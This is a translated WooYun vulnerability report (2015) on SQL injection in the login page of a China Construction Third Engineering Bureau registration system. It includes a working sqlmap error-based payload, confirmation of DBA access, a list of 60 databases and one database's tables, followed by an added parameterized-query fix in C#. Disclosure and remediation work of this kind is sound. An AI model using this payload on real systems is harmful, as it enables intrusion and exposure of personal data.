
Vulnerability Summary

Defect ID: wooyun-2015-0145403

Title: SQL injection vulnerability on a China Construction Third Engineering Bureau (中建三局) site (60 databases / DBA privileges involved)

Related vendor: cncert National Internet Emergency Center

Author: 路人甲

Submitted: 2015-10-09 12:29

Fixed: 2015-11-27 17:52

Published: 2015-11-27 17:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-10-09: Details sent to the vendor, awaiting vendor handling
2015-10-13: Vendor confirmed; details visible to the vendor only
2015-10-23: Details opened to core white hats and relevant domain experts
2015-11-02: Details opened to regular white hats
2015-11-12: Details opened to intern white hats
2015-11-27: Details opened to the public

Brief description:

As in the title.

Details:

URL:http://**.**.**.**:8012/login.aspx

[Screenshot: 11.png]


Injection test:

POST /login.aspx HTTP/1.1
Host: **.**.**.**:8012
Proxy-Connection: keep-alive
Content-Length: 349
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8012
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8012/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD%2Bg4lEUPB%2BJsmGq%2FVMwgAOHQ%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBQLQ3t%2B6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH%2BS1AJHtQk&TextBox1=admin&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0

Proof of vulnerability:

Databases:

available databases [60]:
[*] 04F-MEP
[*] 1111
[*] 16F-MEP
[*] 5FBIM
[*] B1F
[*] BIMFIMBasic
[*] BIMFIMUserManage
[*] BJ_IKEA_B1_MEP
[*] CostManage
[*] CscecKq_GPRS
[*] HBDS01
[*] HBDS02
[*] JPS
[*] JPS-XT
[*] JZ
[*] master
[*] model
[*] MR2000DB
[*] msdb
[*] NT
[*] ProjectDocument
[*] ProjectDocument1
[*] ProjectDocument10
[*] ProjectDocument11
[*] ProjectDocument3
[*] ProjectDocument4
[*] ProjectDocument6
[*] ProjectDocument9
[*] QD
[*] RD
[*] ReportServer
[*] ReportServerTempDB
[*] RFD
[*] SH_SOHO_AS
[*] SH_SOHO_B1_AS
[*] SH_SOHO_B1_MEP
[*] SH_SOHO_B2_MEP
[*] SH_SOHO_B3_MEP
[*] tempdb
[*] WH_IKEA_GLF
[*] WH_IKEA_L10_LDJF
[*] WH_IKEA_L10A
[*] WH_IKEA_L10B
[*] WH_IKEA_L10C
[*] WH_IKEA_L11A
[*] WH_IKEA_L11B
[*] WH_IKEA_L11C
[*] WH_IKEA_L12A
[*] WH_IKEA_L12B
[*] WH_IKEA_L12C
[*] WH_IKEA_L13A
[*] WH_IKEA_L13B
[*] WH_IKEA_L13C
[*] WH_IKEA_L14C
[*] WH_IKEA_L15
[*] WH_JD_N4_CF
[*] Wul_DataAnalysis
[*] XFD
[*] XFS
[*] zk


Privileges:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: TextBox1 (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD+g4lEUPB+JsmGq/VMwgAOHQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQLQ3t+6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH+S1AJHtQk&TextBox1=admin'+(SELECT 'wEcF' WHERE 1310=1310 AND 7705=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7705=7705) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(113))))+'&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0
---
[19:45:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:45:57] [INFO] testing if current user is DBA
current user is DBA: True
[19:45:57] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'


CscecKq_GPRS:

[103 tables]
+---------------------------+
| ANQUANJISHU_JIAODI |
| AQHYI |
| AQHYI_SDEMP_COUNT |
| AQJSJD_SDEMP_COUNT |
| AQJSJD_YDEMP_COUNT |
| AQPX_TYPE |
| AQ_PX |
| AQ_PX_SDEMP_COUNT |
| BANZU |
| DB_BACKUP |
| Depart |
| DoorRightList |
| EMPLOYEE |
| EMP_BX |
| EMP_GLRY |
| EMP_GLRY_TYPE |
| EMP_GZ |
| EMP_HEIMINGDAN |
| EmpManage |
| FB_BASE |
| FB_BZ_EMP |
| FB_LIANXIREN |
| GANGWEI_BASE |
| GC_TYPE |
| GENZONG_ZHUTI |
| GS_User |
| GWZHIZE_XM |
| GZJS_TYPE |
| GZ_BASE |
| HB_UPLOADCONFIG |
| JCX_JY_SDEMP_COUNT |
| JCX_JY_YDEMP_COUNT |
| JG_XINGSHI |
| JINGCHANGX_AQJY |
| JUPD_DENGJI |
| JXCAQJY_TYPE |
| KQMACHINE_GL |
| LBLY_GL |
| LBLY_GL_MX |
| LBWUL_BASE |
| LOGIN_EMP |
| NICY_GLMS |
| QIYE_TYPE |
| QX_ENABLE |
| QX_FB_F_XM |
| QX_FENG_XM |
| QX_GROUP |
| QX_MAIN |
| QX_SUOSHUZU |
| QX_TZJMC |
| QX_XIANGMU |
| SANJI_AQJY_DJ |
| SYS_LOG |
| SYS_NEWS |
| TESHU_GZ_BASE |
| TZJMC |
| TZJMC_SET |
| T_KQ |
| XINXI_LAIYUAN |
| XM_BASE |
| YH_XINXI |
| ZHUZZHI_TYPE |
| ZIZHI_DENGJI |
| _GPRSKQ_DATAGET |
| _GPRS_Analys_Log |
| _GPRS_Communication |
| _GPRS_Communication_TMP |
| _GPRS_DoorControl_KongABC |
| _GPRS_DoorRightList |
| _GPRS_Employee_tmp |
| _GPRS_Error |
| _GPRS_FP_SendResult |
| _GPRS_Fp_fpData1 |
| _GPRS_Fp_fpData2 |
| _GPRS_Fp_fpData3 |
| _GPRS_Fp_fpData4 |
| _GPRS_Fp_fpIC |
| _GPRS_Fp_fpID |
| _GPRS_Fp_fpName |
| _GPRS_Fp_fpPwd |
| _GPRS_ID |
| _GPRS_ID_DoorControl |
| _GPRS_KQ_Data |
| _GPRS_KQ_Data_HIST |
| _GPRS_KQ_Data_HIST2 |
| _GPRS_KQ_Data_HIST3 |
| _GPRS_Language |
| _GPRS_UpTime |
| _GPRS_yuansdkjl |
| _GPRS_yuansdkjl_HIST |
| _GPRS_yuansdkjl_HIST2 |
| _GPRS_yuansdkjl_HIST3 |
| _KQCANSHU |
| _YL_Card |
| dtproperties |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| skySecCredit |
| tb_card_rec |
| tb_worker |
+---------------------------+

Remediation:

This site is mainly a real-name registration information management system, and by the look of it a great deal of personal information would be exposed. Given the sheer volume of data, I did not test any further.

Copyright notice: please credit the source when reposting: 路人甲@乌云
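The remediation section gives no concrete fix, so here is an added example (my code, not the reported site's and not part of the original report) of the change that closes this class of bug on an ASP.NET WebForms login page backed by SQL Server: the vulnerable pattern that splices TextBox1/TextBox2 into the SQL text, beside the parameterized query that removes the injection. The table name LOGIN_EMP comes from the dumped table list above; the column names, the connection string and the class name are assumptions. The sqlmap output above also reports "current user is DBA: True", so the connection string in the example deliberately uses a least-privilege login rather than a sysadmin account.

```csharp
// Added example, not code from the reported site. Table LOGIN_EMP is from the dumped
// table list; the column names (UserName, PasswordHash), the connection string and the
// class name are assumptions.
using System;
using System.Data;
using System.Data.SqlClient;

public static class LoginCheck
{
    // Assumed least-privilege connection: a login scoped to the application's own
    // database, not a sysadmin account. With this in place, even an injection would not
    // yield "current user is DBA: True" or enumeration of every database on the instance.
    public const string ConnectionString =
        "Server=DB-HOST;Database=CscecKq_GPRS;User Id=app_login_user;Password=<secret>;";

    // VULNERABLE: the user-controlled values are concatenated into the SQL text, so a
    // single quote in the input changes the statement itself. Kept only to show the defect.
    public static bool VulnerableLogin(SqlConnection conn, string user, string pass)
    {
        string sql = "SELECT COUNT(*) FROM LOGIN_EMP WHERE UserName = '" + user +
                     "' AND Password = '" + pass + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // FIXED: the statement text is constant and the values travel as typed parameters,
    // so SQL Server never interprets user input as SQL. Comparing a stored password hash
    // instead of the clear-text password is a second, independent improvement.
    public static bool SafeLogin(SqlConnection conn, string user, string passwordHash)
    {
        const string sql =
            "SELECT COUNT(*) FROM LOGIN_EMP WHERE UserName = @user AND PasswordHash = @hash";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = user;
            cmd.Parameters.Add("@hash", SqlDbType.NVarChar, 128).Value = passwordHash;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Page-level usage: the ImageButton click handler opens the connection and calls
    // SafeLogin with the submitted user name and the hash of the submitted password.
    public static bool Authenticate(string user, string passwordHash)
    {
        using (var conn = new SqlConnection(ConnectionString))
        {
            conn.Open();
            return SafeLogin(conn, user, passwordHash);
        }
    }
}
```

The same parameterization has to be applied to every other query that reads form fields, not just the login check; the error-based technique shown in the sqlmap output works against any concatenated query that surfaces a conversion error to the client, so detailed SQL errors should also be kept out of the HTTP response.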


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-10-13 17:51

Vendor reply:

CNVD confirms the situation described; it has been forwarded via CNCERT to the Hubei branch center, which will subsequently attempt to coordinate handling with the website's administering organization (a new working contact needs to be established).

Latest status:

None yet